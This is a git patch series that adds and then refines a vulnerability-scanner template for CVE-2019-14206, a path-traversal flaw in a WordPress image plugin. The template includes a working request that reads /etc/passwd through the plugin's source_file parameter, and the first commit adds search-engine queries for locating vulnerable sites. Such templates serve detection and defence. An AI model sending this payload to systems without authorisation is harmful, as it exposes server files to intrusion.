From a6dd44f7b8a148449128dd51cba877f78198bf8d Mon Sep 17 00:00:00 2001
From: guilhermemour2018-art <guilhermemour2018@gmail.com>
Date: Sun, 4 Jan 2026 01:49:16 -0300
Subject: [PATCH 1/2] Add files via upload

---
 CVE-2019-14206.yaml | 57 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 CVE-2019-14206.yaml

diff --git a/CVE-2019-14206.yaml b/CVE-2019-14206.yaml
new file mode 100644
index 000000000000..f17cad88b7bb
--- /dev/null
+++ b/CVE-2019-14206.yaml
@@ -0,0 +1,57 @@
+id: CVE-2019-14206
+
+info:
+  name: WordPress Nevma Adaptive Images <0.6.67 - Arbitrary File Deletion / LFI
+  author: cascade
+  severity: high
+  description: |
+    The WordPress Nevma Adaptive Images plugin before 0.6.67 contains unsafe handling of user input in adaptive-images-script.php, enabling arbitrary file deletion and file read. An attacker can control the path used by the cache mechanism and read sensitive files (e.g., /etc/passwd) or delete arbitrary files.
+  impact: |
+    Successful exploitation can read sensitive files or delete arbitrary files accessible to the web server user, leading to information disclosure, denial of service, or further compromise.
+  remediation: |
+    Update the plugin to version 0.6.67 or later where input sanitization was added.
+  reference:
+    - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
+    - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
+    - https://wpscan.com/vulnerability/7beaa002-880e-4f94-9f6d-61a8497b9019
+  classification:
+    cve-id: CVE-2019-14206
+    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 9.1
+    epss-score: 0.04139
+    epss-percentile: 0.91415
+    cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: nevma
+    product: adaptive_images
+    framework: wordpress
+    shodan-query: 'title:"WordPress" "Adaptive Images"'
+    fofa-query: 'body="adaptive-images-settings" && body="adaptive-images-script.php"'
+    verified: true
+  tags: cve,cve2019,wordpress,wp-plugin,filedeletion,arbitrary-file-deletion,lfi,wp
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:x:0:0:root"
+          - "/bin"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - image/jpeg
+
+      - type: status
+        status:
+          - 200

From 8858e13a0d12942ee2dfb0f2186ef3b96353df2d Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 5 Jan 2026 10:35:59 +0530
Subject: [PATCH 2/2] Update and rename CVE-2019-14206.yaml to
 http/cves/2019/CVE-2019-14206.yaml

---
 .../cves/2019/CVE-2019-14206.yaml             | 28 ++++---------------
 1 file changed, 6 insertions(+), 22 deletions(-)
 rename CVE-2019-14206.yaml => http/cves/2019/CVE-2019-14206.yaml (70%)

diff --git a/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml
similarity index 70%
rename from CVE-2019-14206.yaml
rename to http/cves/2019/CVE-2019-14206.yaml
index f17cad88b7bb..a8c1d91e16f8 100644
--- a/CVE-2019-14206.yaml
+++ b/http/cves/2019/CVE-2019-14206.yaml
@@ -14,7 +14,6 @@ info:
     - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
     - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
     - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
-    - https://wpscan.com/vulnerability/7beaa002-880e-4f94-9f6d-61a8497b9019
   classification:
     cve-id: CVE-2019-14206
     cwe-id: CWE-22
@@ -25,33 +24,18 @@ info:
     cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
-    vendor: nevma
-    product: adaptive_images
-    framework: wordpress
-    shodan-query: 'title:"WordPress" "Adaptive Images"'
-    fofa-query: 'body="adaptive-images-settings" && body="adaptive-images-script.php"'
     verified: true
-  tags: cve,cve2019,wordpress,wp-plugin,filedeletion,arbitrary-file-deletion,lfi,wp
+  tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,adaptive-images
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "root:x:0:0:root"
-          - "/bin"
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body)"
+          - 'contains(body, "adaptive-images")'
+          - "status_code == 200"
         condition: and
-
-      - type: word
-        part: header
-        words:
-          - image/jpeg
-
-      - type: status
-        status:
-          - 200